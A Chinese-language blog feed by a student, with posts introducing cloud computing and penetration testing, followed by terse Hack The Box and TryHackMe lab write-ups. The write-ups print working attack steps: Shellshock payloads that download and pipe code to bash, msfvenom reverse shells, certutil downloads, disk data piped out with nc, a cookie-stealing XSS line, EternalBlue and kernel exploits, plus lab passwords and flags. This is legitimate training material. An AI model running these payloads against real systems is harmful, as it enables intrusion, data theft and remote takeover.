通常來說，我覺得雲端設備最大的優點就是：不需要自己管理實體的設備。比起自己在家裡的電腦，總是要提心吊膽不小心踢到插頭；放在公司機房裡面的伺服器設備，也需要時刻的注意門禁、空調等各種實體的維護。如果使用了雲端的服務，使用者只需要顧慮使用層面的問題，不需要思考實體層面的因素，因為這些問題全權的交由服務商處理！

雲端可以透過大量的異地備份，確保資料的安全性。舉例來說，如果我有一筆非常重要的資料，可能放一份在公司；放一份在住家；放一份在好朋友的家裏……。假設有一天，台北市，或是整個台灣對全世界的網路因故斷掉了，這些資料依然無法在國外被取用。通常雲端設備商會在許多的國家與區域設置據點與資料中心，例如 Google 在台灣的彰濱工業區就有設立資料中心。我們可以將重要資料同時放在台灣、美國、英國、日本……世界的各個角落。就算其中有一個國家突然爆炸了(?，我們也可以透過其他的伺服器取得我們的資料。

雲端設備比起地端的設備，也有擴充性的優勢，假設機構內需要添購新的伺服器，通常會需要跑一系列的請購流程，並等待物流配送、安裝，十分的曠日廢時。而若使用了雲端的設備，如果我們需要添購、增加一台新的伺服器，在網頁上點一點，甚至是透過指令控制，1分鐘內就有辦法安排好，並使用一台全新，乾淨的伺服器。設備更新方面也是，我們隨時可以透過雲端，要求一台全新的機器，並把程式與資料自動的轉移。

雲端設備的在許多情境下也可以降低成本，假設我們需要透過高級的 CPU 、 GPU 進行一系列的運算。需求可能是每個月須要執行一次，而執行一次的時間是數個小時。在這種情形下我們也可以透過短期的租用雲端伺服器，使用完畢後就把機器還給人家，需要付的錢也就只有租用的時間而已。

雲端的缺點

講了那麼多雲端的優點，接下來當然也要跟各位分享一下雲端相關的缺點。首先，我覺得雲端最大的缺點就是安全與隱私相關的問題。畢竟無論如何，資料與設備就是放在服務商的地方，就算服務商如何地進行保證，透過各種的白皮書進行說明，我們仍然可能對於資料的安全性進行懷疑。說不定該公司哪一天，可能基於任何的理由，做出侵犯用戶資料隱私的事情。例如近期的 iCloud 相關新聞，無論是否是極權國家，政府都可能會透過各種的手段要求營運商交出資料，而交出資料後，任何人都無法保證會被怎麼樣的使用。當然，面對這些疑慮，這些公司也有提出了許多的解決方案。

除了安全與隱私的缺點之外，我們還需要考量到雲端的傳輸速度，雖然雲端可以讓我們不用管理大量的伺服器與硬碟，但資料想要拿回來使用時，終究還是要透過網路。如果有數百 TB 、甚至 PB 等級的資料，透過網路的傳輸往往曠日廢時。目前雲端相關的解決方法主要是可以透過 Peering (對等連線)，等專線的方式，成本通常都不便宜。

雲端還會有一些靈活性相關的問題，假設我們在 Google Cloud 上使用了某些的雲端服務，如果未來想要移植到 Amazon 的 AWS；或是 Microsoft 的 Azure 上，通常都不見得會太容易；有時候我們使用了任何的一個雲端營運商的服務，很可能就會被對他產生依賴，未來也有可能會被養、套、殺，一切都要看業者的良心。

總結

雲端運算是由於網路速度變快，而開始發展出來的新概念，通常雲端都會由服務商代理我們管理機器，我們可能永遠都看不到自己在雲端上跑的機器實際上長什麼樣子。雲端最大的優點就是靈活性，我們可以快速的將服務部屬在世界各地；而雲端的缺點則是安全性、速度與可能對雲端服務商產生依賴性等問題。我們的生活已經逐漸的離不開雲端，了解一些基礎的雲端知識是非常實用的！

今天的文章差不多就到這邊，預計明天會跟各位介紹幾個常見的雲端名詞 IaaS、PaaS 與 SaaS 等！

[Day2]What is Pentest (2021 鐵人賽 – PT)

Fri, 17 Sep 2021 18:32:00 +0800

滲透測試簡介

今天來跟各位介紹一下，什麼是滲透測試。滲透測試(Penetration Test)，簡稱 Pentest (~~筆測試~~)、PT，是公司、機構希望尋找以駭客的思維試圖入侵自己的系統，嘗試尋找出其設備之中的弱點。

攻擊方可稱為紅隊，紅隊會嘗試透過各種方式，掃描與試圖入侵公司的設備。除了網頁之外，包含任何軟硬體都可以是滲透測試的目標。為什麼一間公司會需要做滲透測試呢？難道透過足夠高級的防火牆、防毒等防護設備不夠嗎？事實上，滲透測試主要針對的與處理的對象，是在嘗試找出機構內的軟硬體是否有設計上的缺陷，或年久失修等。

滲透測試與弱點掃描

許多人可能會聽過另外一個名詞：弱點掃描，弱點掃描可以是滲透測試的一環，但弱點掃描並不能完全地等於滲透測試。通常的弱點掃描都是透過現有的程式，針對系統做全自動化的掃瞄。相對於滲透測試而言，其成本較低，但效果也較差，因為比較無法針對特定的對象進行客製化的服務，而滲透測試則是可以針對指定的對象，給予最適合的需求與服務。

滲透測試相關指引

滲透測試與各種資安技能一樣，都有許多相關的規範可以參考，但大多數的規範也都可以拿來參考使用，常見的規範與資源有以下幾項。

OWASP Testing GuideOWSAS 全名 Open Web Application Security Project®，直接的翻譯為「開放網路安全計畫」，相信各位對 OWASP 應該都不陌生， OWASP 除了最著名的 Web Top 10 之外，還有非常多其他的資源可以取用。OSSTMM- OSSTMM 全名是 The Open Source Security Testing Methodology ，是 The Institute for Security and Open Methodologies (ISECOM) 提出的。PTES- PETS 是寵物 Penetration Testing Execution Standard。

滲透測試與 CTF

剛開始學習資安的新手，如果是以攻擊者為角度的資安，通常都會從 CTF 入手，CTF 面臨的通常都是以特定的漏洞包裝的題目，訓練大家有自行挖掘漏洞的能力。而通常簡易的滲透測試，除了挖掘漏洞之外，我們更常會運用現有的資源來進行攻擊與測試，例如已經公開 Exploit 的 CVE 漏洞等。

在 CTF 中，通常比較不會出現一些枚舉，暴力破解等相關的技術；因為往往這對於純研究資安技術的領域而言是一件滿無聊的事情，只要字典檔夠充足、時間足夠的狀況下就可以暴力破解、搜尋出來。但是現實生活中的場域就非常不一樣了，現實生活中常常因為使用者的疏漏，使用各種的弱密碼；忘記刪除某些測試的檔案。這種以「人」為主的弱點，以技術的角度來說，通常都會比 CTF 簡單滿多，也都是 PT 需要進行考量的部分。

滲透測試的流程

在滲透測試開始之前，最最最最重要的事情是請於滲透測試前，取得對方的同意，定義好滲透測試的目標，千萬要保護好自己，也要保護好客戶。

[Day1] Motivation (2021 鐵人賽 – PT)

Thu, 16 Sep 2021 18:36:00 +0800

真ㄉ有可能在 30 天內搞懂 Cloud ㄇ ?__?
~~不可能，好，大家掰掰~~
哈囉大家好，打ㄍㄟ厚，我是目前就讀天大地大台科大的 Steven Meow，這是我第一次參加鐵人賽，希望可以順利的持續30天，把文章給順利寫完！

開賽的第一天，輕鬆一點的跟大家聊聊，為什麼我想要寫這個主題。在今年的三月多，我參加了由 Google 舉辦的 Cloud Student Sprint Project。我覺得這個計畫是一個滿硬的計畫 QQ ，花了三個月的時間，透過了許多的線上課程以及資源，學會了 Google Cloud 的基礎知識，並在計畫的最後報考了 Google Cloud Associate Cloud Engineer 的證照。很幸運的，我通過惹！！！

本系列的文章將使用 Google Cloud 當作主要的介紹對象，提供給已經有一點點程式與作業系統基礎的讀者們，並預計以以下幾個內容開始做發想：

雲端概述
雲端 Project 與 IAM
雲端運算
雲端儲存
雲端解決方案的選擇等

Google Cloud 官方的 Document 與大多數的網頁資源皆以英文為主，雖然目前 Google Cloud 已經有了中文化的界面，不過常常有與多翻譯上的誤差，不方便理解 QQ ，因此本系列的文章預計在相關的專有名詞上主要會使用英文，而解說的部分則是中文。(我才……才不是為了怕不小心打出晶晶體而提早位自己辯護呢！ ><

除了這篇內容之外，我也有報名 Security 組的比賽，題目是「我想學滲透測試喵喵喵喵！！！！」內容主要會介紹常見的滲透測試流程與工具，會比較多實作的東東，也請大家多多支持與愛護！

[Day1] Motivation (2021 鐵人賽 - Cloud)

Thu, 16 Sep 2021 18:30:00 +0800

哈囉大家好，打ㄍㄟ厚，我是目前就讀天大地大台科大的 Steven Meow，這是我第一次參加鐵人賽，希望可以順利的持續30天，把文章給順利寫完！

如同簡介所述，現在的網路上的資安相關教學，大多數技術層面的都以 CTF 為主。我覺得 CTF 雖然有時候很好玩，但常常會出現一些非常刁鑽的題目，使得新手在接觸了不適合的題目後，就開始害怕資安；而這些 CTF 題目也時常會與現實世界脫節，打完了 CTF 後卻不知道可以運用在什麼地方。曾經有某軟體公司的從業人員跟我說，非常多學生時期在玩 CTF 的人，畢業後，卻跑去當碼農做軟體開發，因為在現實生活中不知道如何運用。我覺得這是一種滿可惜的事情 QQ。

本系列的文章預計會介紹以滲透測試為主的內容，帶大家轉換 CTF 的思維，接觸現實世界中常出現的資安漏洞。在大多數的情景下，這些漏洞都會比 CTF 的題目簡單很多。最最重要的是轉換思維，善加的運用手邊現有的資源與工具！預計的文章架構如下：

滲透測試介紹
工具介紹
練習平台介紹
實戰介紹

在前幾天的時間，會先與各位分享滲透測試的基礎觀念，以及相關使用的工具與環境；再來會介紹提供初學者使用的各種練習平台；接下來就會進入實戰演練，也就是打靶機的部分。我個人喜歡做中學的感覺，透過真正的實戰，並在過程中學習，我覺得效果會比起單純教科書上的紙上談兵好很多！希望透過這種方式可以對大家有幫助！

除此之外，我也有報名 IT管理組的比賽，題目是「真ㄉ有可能在 30 天內搞懂 Cloud ㄇ ?__?」內容主要會介紹 Google Cloud 相關的概念與使用方法，比起這邊的文章會更理論一點，也請大家多多支持與愛護！

Shocker (Hack The Box Writeup)

Wed, 15 Sep 2021 14:06:00 +0800

IP : 10.129.213.104
URL : https://app.hackthebox.eu/machines/108

Recon

Rustscannmap- 觀察首頁- 通靈掃到目錄 /cgi-bin/user.sh-

Shell shock

在 User agent 增加() { :;}; echo; /usr/bin/id
User-Agent: () { :;}; echo; /usr/bin/wget 10.10.16.35:8000/s_HTB /tmp/s- 下載 shell
執行 shell- User-Agent: () { :;}; echo; /usr/bin/wget -O - 10.10.16.35:8000/s_HTB | /bin/bash

Reverse shell

收 shellSpawn shell- python3 -c 'import pty; pty.spawn("/bin/bash")'Get user flag-
6e9aad0e2498bff702b570c2da380288

提權

跑豌豆可以執行 perl- sudo perl -e 'exec "/bin/sh";'取得 Root Flag-
e3e05cbd925c9e407215bb26e9b7e47d

Nibbles (Hack The Box Writeup)

Wed, 15 Sep 2021 14:02:00 +0800

URL : https://app.hackthebox.eu/machines/121
IP : 10.129.214.27

Recon

Rustscan觀察首頁-
Apache
找到隱藏目錄 /nibbleblog/看起來是一個 CMS- 搜尋 Exploit-
看起來 4.0.3 版本有洞
有帳密就可以傳東西
https://github.com/TheRealHetfield/exploits/blob/master/nibbleBlog_fileUpload.py繼續掃目錄- http://10.129.214.27/nibbleblog/admin/
登入頁面- install- updateGoogle 到預設密碼- admin / nibbles
這邊有點通靈 QQ

Exploit

用 MSFmsf multi/http/nibbleblog_file_upload``spawn shell- python3 -c 'import pty; pty.spawn("/bin/bash")'取得 User flag-

提權

起手式可以執行 monitor.sh直接用/bin/bash蓋掉- sudo 執行-
取得 Root取得 Root Flag-
4c0ebef2dfb32a8d33212e1a902f50f2

Mirai (Hack The Box Writeup)

Wed, 15 Sep 2021 14:01:00 +0800

URL : https://app.hackthebox.eu/machines/64
IP : 10.129.214.20

Recon

http://10.129.214.20/首頁是空ㄉ
Rustscan- nmap- nmap -A -p22,53,80,2000,32400,32469 10.129.214.20dirsearch 掃目錄- 32400 Port 跑了一個 PLEX- Pi-Hole 在 :80/admin-
https://www.exploit-db.com/exploits/48442需要密碼才能 RCEdnsmasq Exploit
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py

爆破密碼

hydra -l '' -P /opt/wordlists/rockyou.txt 10.129.214.20 http-post-form "/admin/index.php?login:pw=^PASS^:Forgot password"
跑了很久都沒有，應該不是 QQ

Exploit

看到 Pi-Hole 又有 PLEX 影音伺服器猜他是樹梅派所以 pi 預設帳密- pi / raspberrySSH-
好無聊 = =取得 User Flag- ff837707441b257a20e32199d7c8838d

提權

起手式 sudo -l
發現可以直接變 root

數位鑑識

取 root flag
搞事ㄛ = =確認外接裝置- 到隨身碟裡找東西-
詹姆斯在搞ㄛ = =直接暴力解- strings 硬碟
3d3e483143ff12ec505d026fa13e020b暴力解也可以傳回本地處理- 本地監聽 nc -l 1234 > usbstick.dump
遠端用 dd 把資料丟出來sudo dd if=/dev/sdb | nc -w3 10.10.16.35 1234

嘗試失敗的方法 (Testdisk)

使用 Testdisk 還原https://blog.gtwang.org/linux/testdisk-linux-recover-deleted-files/用 scp 傳過去- 解壓縮- 用 sudo 執行- 選定硬碟 sdb- 預設沒有分割區- 選擇格式- 找到刪除的 root.txt-
選到 root.txt 按 C
選存檔位置-
但這樣出來的檔案是空的 QQ

Jerry (Hack The Box Writeup)

Wed, 15 Sep 2021 13:58:00 +0800

URL : https://app.hackthebox.eu/machines/144
IP :10.129.1.110

Scan

掃 Portrustscan -a 10.129.1.110 -r 1-65535
發現有開8080

Brute Force

嘗試 msf 爆破auxiliary/scanner/http/tomcat_mgr_login
發現密碼是 tomcat:s3cret
Wordlist- /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

進入 Manager APP

發現不登入直接按 Manager App 就可以進後台ㄌ= =

Web shell

準備 jsp web shellhttps://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jspjar -cvf cmd.war cmd.jsp- 上傳 webshell- 執行 webshell-
發現本來就是 system 權限確認系統資料-
64 bit

Reverse shell

準備 Reverse shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe > shell.exe下載 reverse shell- certutil -urlcache -f http://10.10.16.35/shell.exe shell8787.exe
執行 Reverse shell- 取得 Flag-

Grandpa (Hack The Box Writeup)

Wed, 15 Sep 2021 13:54:00 +0800

URL : https://app.hackthebox.eu/machines/13
IP : 10.129.2.85

Recon

Rustscan
開 80 portnmap- 發現是 IIS6 可以用 CVE-2017-7269 RCE
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

Exploit

執行 Exploit開 nc 收 shell- 跑 systeminfo- 發現 Windows 2003 可以跑 Churrasco- https://github.com/Re4son/Churrasco用 impacket-smbserver meow . 開-
執行 Churrasco提權完畢- 取得 User Flag- bdff5ec67c3cff017f2bedc146a5d869取得 Root Flag-
9359e905a2c35f861f6a57cecf28bb7b

Granny (Hack The Box Writeup)

Wed, 15 Sep 2021 13:54:00 +0800

URL : https://app.hackthebox.eu/machines/14
IP : 10.129.2.63

Recon

觀察首頁
IIS 6nmap 掃 port- nmap -A -p80 10.129.2.63
掃目錄- 發現一些奇怪的 dll-
http://10.129.2.63/_vti_inf.html
FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
TPScriptUrl="_vti_bin/owssvr.dll"

Exploit

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269![](/uploads/2022/02/d60bd-EOeoMgt.png)nc 收 shell- 確認使用者- systeminfo- 送 windows-exploit-suggester.py- 測 CVE-2015-1701- https://github.com/hfiref0x/CVE-2015-1701
certutil -urlcache -f http://10.10.16.35/Taihou32.exe Taihou32.exe
impacket-smbserver meow .
copy \\10.10.16.35\meow\Taihou32.exe Taihou32.exe
shell 卡住不能用 QQQ

提權

準備 shellmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f dll > s.dll
rundll32 s.dll``churrasco-
churrasco.exe -d “shellx86.exe"nc 收 shell- User flag-
700c5dc163014e22b3e408f8703f67d1Root Flag-
aa4beed1c0584445ab463a6747bd06e9

學到ㄌ

smb 傳檔案
盡量 webshell QQ

Blue (Hack The Box Writeup)

Wed, 15 Sep 2021 13:41:00 +0800

URL : https://app.hackthebox.eu/machines/51
IP : 10.129.209.90

Recon

Rustscannmap- nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90系統版本- Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)smb-
nmapAutomator-

Exploit

https://github.com/helviojunior/MS17-010修改 send_and_execute.py 裡面的 username等於 guestMSF 準備 shell- msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe其實這邊用 x86 也可以執行 Exploit- python send_and_execute.py 10.129.216.62 ../shellx64.exe
nc 收 shell-

MSF Exploit

use windows/smb/ms17_010_eternalblue
options
set RHOSTS 10.129.216.62
set LHOST 10.10.16.35
runGet Root Key- ff548eb71e920ff6c08843ce9df4e717
Get User Key-
4c546aea7dbee75cbd71de245c8deea9

Blocky (Hack The Box Writeup)

Wed, 15 Sep 2021 13:40:00 +0800

URL : https://app.hackthebox.eu/machines/48
IP : 10.129.1.53

Recon

RustscanNmap- 觀察首頁-
看起來是 Wordpress掃目錄- https://www.exploit-db.com/exploits/46676
phpmyadmin
pluginsPHPmyadmin-
Version 4.5.4.1
有 Exploithttps://www.exploit-db.com/exploits/40185要帳密繼續觀察-
他有一個 Wiki
其實剛剛 dirsearch 就有看到

Wordpress

觀察 Wordpress 使用者http://10.129.1.53/index.php/?author=1
notch
嘗試登入 /wp-admin- 觀察目錄 /plugins- plugins
裡面有兩個檔案
感覺 BlockyCore.jar 是它們自己寫的

Reverse

用 r2 觀察算ㄌ還是不要裝逼，乖乖用 jd-gui 笑死- 找到 db 帳密- root
8YsqfCTnvxAUeduzjNSXe22

PHP My admin

用帳密登入後找到 Wordpress 使用者頁面
備份原本使用者的 hash 以備不時之需
$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/把 hash 修改成 12345 的 md5- 827ccb0eea8a706c4c34a16891f84e7b

登入 Wordpress

用帳號 notch 密碼 12345 登入在 plugin 中增加 php web shell- 確認 webshell 可用- 下載 reverse shell- http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=wget%2010.10.16.35:8000/s_HTB執行 webshell- http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=bash%20s_HTB

Reverse shell

spawn shellpython3 -c 'import pty; pty.spawn("/bin/bash")'

提權

跑 Linpeas
發現可以 Kernel Exploit
https://github.com/rlarabee/exploits/tree/master/cve-2017-16995編譯並丟過去- https://raw.githubusercontent.com/rlarabee/exploits/master/cve-2017-16995/cve-2017-16995.c
取得 Flag- User
59fee0977fb60b8a0bc6e41e751f3cd5Root-
0a9694a5b4d272c694679f7860f1cd5f看了一下正規解- 貌似可以直接用 SQL 密碼 SSH 登入
然後 sudo su 就結束ㄌ
ㄏㄏ

Bashed (Hack The Box Writeup)

Wed, 15 Sep 2021 13:39:00 +0800

URL : https://app.hackthebox.eu/machines/118
IP : 10.129.209.72

Recon

RustscanWeb- dirsearch 發現 /dev/ 裡面有 phpbash

PHP Bash

可以直接用 cat /etc/passwd 指令

Reverse shell

直接戳習慣的 reverse shell 會自動離開改戳 msf 的 reverse shell- msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f elf > shell就順利接上了- spawn shell- python -c 'import pty; pty.spawn("/bin/bash")'

提權

起手式 sudo -l
可以切換使用者到 scriptmanager
sudo -u scriptmanager bash
跑 Linpeas 傳回來- cat s_peas.txt > /dev/tcp/10.10.16.35/1234使用 CVE-2017-16995 Kernel Exploit-
wget http://10.10.16.35/CVE-2017-16995/exploit
成功提權取得 Root Flag- cc4f0afe3a1026d402ba10329674a8e2

提權 2

觀察 /scripts裡面看起來是 cronjob 跑 Python
用 msf 再生一個 reverse shell (跟目前不同 port)- msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f elf > shell1傳到靶機加權限- wget 10.10.16.35/shell1
chmod 777 shell1寫入 cron job 的 py- echo 'import os' >> test.py
echo 'os.system("/scripts/shell1")' >> test.py收到 Reverse shell-

Bank (Hack The Box Writeup)

Wed, 15 Sep 2021 13:38:00 +0800

URL : https://app.hackthebox.eu/machines/26
IP : 10.129.29.200

Recon

RustscanNmap- 通靈加 Host- 加 /etc/hosts加 Host 載下來看-
發現 302 轉走，但其實是有資料ㄉ掃目錄-
http://bank.htb/assets/

嘗試傳 Webshell

support.php
看起來可以傳檔案
但只能傳圖片嘗試用各種方法繞-
但基本上都失敗

取得密碼

通靈掃到 /balance-transfer
發現裡面的資訊都有過加密- 複製出來觀察 size

a = a.replace("[ ] ","")
a = a.split("\n")
l = []
for i in a:
 i = i.split(" ")
 l.append(int(i[1]))
l.sort()
print(l)

發現有一個檔案大小只有257
觀察檔案內容-
取得帳密chris@bank.htb
!##HTBB4nkP4ssw0rd!##順利登入- 又回到 support.php- 測各種副檔名繞過-
s.php%00.jpg
s.php\x00.jpg
都失敗測 XSS- new Image().src="http://10.10.16.35:1234/"+document.cookie
成功檢查註解-
發現可以用 .htb
成功上傳 Webshell-

執行 Reverse shell

bank.htb/uploads/s.htb?A=wget 10.10.16.35:8000/s_HTB
http://bank.htb/uploads/s.htb?A=bash%20s_HTB
spawnpython -c 'import pty; pty.spawn("/bin/bash")'

提權

Kernel Version有奇怪的 SUID 程式- 直接執行-
就 Root shell ㄌ取得 Flag- RootUser-

嘗試不登入傳 shell

先隨便傳Burp 改副檔名 .htb- 上傳成功-
所以取得密碼的那一段根本不用做就可以結束ㄌ= =

學到了

php 副檔名方法
注意註解 QQ

Optimum (Hack The Box Writeup)

Thu, 09 Sep 2021 14:03:00 +0800

URL : https://app.hackthebox.eu/machines/6
IP : 10.129.209.84

Information Gathering

掃 Port觀察 80 port-
HFS 2.3

尋找 Exploit

找到https://www.exploit-db.com/exploits/39161
需要準備 ncwget https://github.com/int0x33/nc.exe/raw/master/nc.exe依照需求開 http server- python3 -m http.server 80
放 nc執行腳本- 收到 Reverse shell- 取得 User flag-

提權

systeminfo載豌豆- certutil -urlcache -f http://10.10.16.35:8000/winPEASx64.exe winpeas.exe
執行豌豆-
看到帳密kostas
kdeEjDowkS*使用 Windows-Exploit-Suggester- https://github.com/AonCyberLabs/Windows-Exploit-Suggester
需要先裝指定版本的 xlrdpip install xlrd==1.2.0``./windows-exploit-suggester.py --update- 尋找推薦的 Exploit　腳本嘗試 MS16-032- wget https://www.exploit-db.com/download/39719 -O Invoke-MS16-032.ps1
載腳本certutil -urlcache -f http://10.10.16.35/Invoke-MS16-032.ps1 Invoke-MS16-032.ps1失敗- https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html
看起來因為他是給 GUI 用的，需要彈出額外視窗嘗試 MS16-098- https://github.com/sensepost/ms16-098
載下來執行
成功取得 System Flag-

Archetype (Hack The Box Writeup)

Thu, 09 Sep 2021 13:35:00 +0800

掃 Port

rustscan -a 10.10.10.27 -r 1-65535nmap 繼續掃- nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
一堆的 RPC
SMB
1433 是 MSSQL

SMB

SMB 匿名登入
發現 backupsbackups 資料夾- 一個 Config 載下來取得密碼資訊-
Host Name : ARCHETYPE
User ID : sql_svc
Password : M3g4c0rp123

MSSQL

安裝 impacketsudo apt install python3-impacket``impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth- MSSQL 取得 Shell 就有機會可以 RCE- exec xp_cmdshell '{指令}'``systeminfo- dir- exec xp_cmdshell 'dir'透過開啟本地 smb- impacket-smbserver meow .準備 Reverse shell- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe經測試，不掛 x86/shikata_ga_nai 就會被 Defender 吃掉

Shell

執行 Shellexec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
收回 Reverse shell- 取得 User Flag

Netmon (Hack The Box Writeup)

Wed, 08 Sep 2021 14:02:00 +0800

URL : https://app.hackthebox.eu/machines/Netmon
IP : 10.129.210.193

Recon

Rustscan

Open 10.129.210.193:80
Open 10.129.210.193:135
Open 10.129.210.193:139
Open 10.129.210.193:445
Open 10.129.210.193:5985

nmap
FTP-
Web- appVersion’:‘18.1.37.13946’
https://github.com/wildkindcc/CVE-2018-9276
https://github.com/chcx/PRTG-Network-Monitor-RCE

FTP

Try Exploithttps://github.com/chcx/PRTG-Network-Monitor-RCE
需要登入才能用，所以我們需要找帳密QQ從官網發現 Log 跟 Config 存在 /ProgramData/Paessler- wget -r ftp://10.129.210.193/ProgramData/Paessler
整包載下來grep password */* | less- 發現 PRTG Configuration.dat 很可疑
看到相關的檔案有以下幾個- PRTG Configuration.old.bak
PRTG Configuration.dat
PRTG Configuration.old
Configuration Auto-Backups/*``PRTG Configuration.old.bak 應該最可疑-
看到帳密prtgadmin
PrTg@dmin2018
但登入失敗通靈把密碼改 2019- prtgadmin
PrTg@dmin2019
登入成功

Exploit

https://github.com/wildkindcc/CVE-2018-9276`python CVE-2018-9276.py -i 10.129.210.202 -p 80 –lhost 10.10.16.35 –lport 7877 –user prtgadmin –password PrTg@dmin2019`
確定權限- 取得 Flag-

學到了

FTP 記得 ls -al 避免隱藏檔案
密碼可以試試看猜規則 QQ年分之類的

Devel (Hack The Box Writeup)

Wed, 08 Sep 2021 13:53:00 +0800

URL : https://app.hackthebox.eu/machines/3
IP : 10.129.208.183

Information Gathering

Port Scanrustscan -a 10.129.208.183 -r 1-65535
21 : FTP
80 : Web

FTP Services

Try to connect to ftpUse Aspx Web shell- https://raw.githubusercontent.com/SecWiki/WebShell-2/master/Aspx/awen%20asp.net%20webshell.aspx

Web Shell

Install Reverse ShellASPX Reverse shell
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

Reverse shell

Check System Infouser : iis apppool\web- System : Win 7 x64 6.1.7600 N/A Build 7600- Check Environment Variable

Privilege Escalation

With OS VersionExploit : MS11-046 Kernel Exploits- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046Download Exploit file to target machine- certutil -urlcache -f http://10.10.16.35:8000/ms11-046.exe ms11-046.exeRun binary-
Get SystemUser Flag- Root Flag-

Legacy (Hack The Box Writeup)

Sun, 05 Sep 2021 14:00:00 +0800

URL : https://app.hackthebox.eu/machines/2

IP : 10.10.10.4

Info gathering

nmap scan portenum4linux check version- nmap check smb version- So… we know that- Domain name : HTB
OS : Windows XP
Open Services : SMB

Find Exploit

GoogleXP SMB Exploit
https://github.com/helviojunior/MS17-010
MS17-010Prepare reverse shell exe file- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7879 -f exe > shell_reverse_tcpRun exploit- Get reverse shell-

Flag

Root FlagUser Flag-

Lame (Hack The Box Writeup)

Sun, 05 Sep 2021 13:59:00 +0800

URL : https://app.hackthebox.eu/machines/Lame

IP : 10.129.197.50

Info gathering

Port Scanning21,22,139,445,3632- Anonymous FTP
SMB
3632 Port distccd

File Protocol

Try anonymous login FTP
It’s emptyTry anonymous login SMB-
There are tmp and opt folder
Access tmp folder
Download all file

Exploit Distccd

Distccd_rce_CVE-2004-2687https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Run Reverse shell-
Get User Flag-

Privilege escalation

Run LinPEASNFS Exploit?- Eterm SGID Binary?- nmap SUID !!Nmap GTFOBins- Shell (2) Interactive shellhttps://gtfobins.github.io/gtfobins/nmap/#suid
nmap --interactive
nmap> !shGet Root Flag-

Beep (Hack The Box Writeup)

Sun, 05 Sep 2021 13:40:00 +0800

URL : https://app.hackthebox.eu/machines/Beep

IP : 10.129.1.226

Recon

80 port is a login pageElastix

Find Payload

LFI

Elastix 2.2.0 - ‘graph.php’ Local File Inclusionhttps://www.exploit-db.com/exploits/37637Try LFI- https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../etc/passwd%00&module=Accounts&action
With python request script, it will throw a exception, because the ssl version is toooo ol.- https://stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl
Use this command to change the min version of TLSsed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf

RCE

Find RCE Codehttps://github.com/infosecjunky/FreePBX-2.10.0—Elastix-2.2.0—Remote-Code-Execution/blob/master/exploit.pyTurn nc to receive reverse shell-

Privilege Escalation

sudo -l check , we can sudo nmapsudo nmap --interactive

Battery (Try Hack Me Writeup)

Thu, 02 Sep 2021 23:51:00 +0800

URL :　https://tryhackme.com/room/battery

IP : 10.10.207.162

Recon

掃 Portrustscan -a 10.10.207.162 -r 1-65535
發現有開22
80nmap -A -p22,80 10.10.207.162-

Web

觀察首頁掃路徑-
/forms/admin.php- 發現 /forms 把 Header 拔掉就不會自動跳轉-
裡面傳送的資料是 XML ，可能可以 XXE但沒有登入都失敗

function XMLFunction(){
 var xml = '' +
 '' +
 '' +
 '' + $('#name').val() + '' +
 '' + $('#search').val() + '' +
 '';
 var xmlhttp = new XMLHttpRequest();
 xmlhttp.onreadystatechange = function () {
 if(xmlhttp.readyState == 4){
 console.log(xmlhttp.readyState);
 console.log(xmlhttp.responseText);
 document.getElementById('errorMessage').innerHTML = xmlhttp.responseText;
 }
 }
 xmlhttp.open("POST","forms.php",true);
 xmlhttp.send(xml);
};

在 register.php 註冊一組帳密meow
ABC
meow
註冊成功嘗試登入-
使用介面上的功能
發現不能使用再註冊一組- meow1
DEF
meow1掃目錄-
發現一個 /report載下來發現是一個 ELF-

Reverse

選單使用者- 字串比較- 更新-
這邊看到 admin@bank.a 滿可疑的

Web

嘗試註冊 admin@bank.a
被嘲諷ㄌQQ
但這代表應該確實跟這個有關!!用 Burp 後面加上 %00 截斷- 註冊成功- 後台亂輸入都會噴錯- 重新試著 XXE-

function XMLFunction(){
 var xml = '' +
 '\n' +
 ' ]>\n' +
 '' +
 '' + "0" + '' +
 '' + "&b;" + '' +
 '';
 var xmlhttp = new XMLHttpRequest();
 xmlhttp.onreadystatechange = function () {
 if(xmlhttp.readyState == 4){
 console.log(xmlhttp.readyState);
 console.log(xmlhttp.responseText);
 }
 }
 xmlhttp.open("POST","forms.php",true);
 xmlhttp.send(xml);
};
XMLFunction();

可以讀檔

cyber:x:1000:1000:cyber,,,:/home/cyber:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
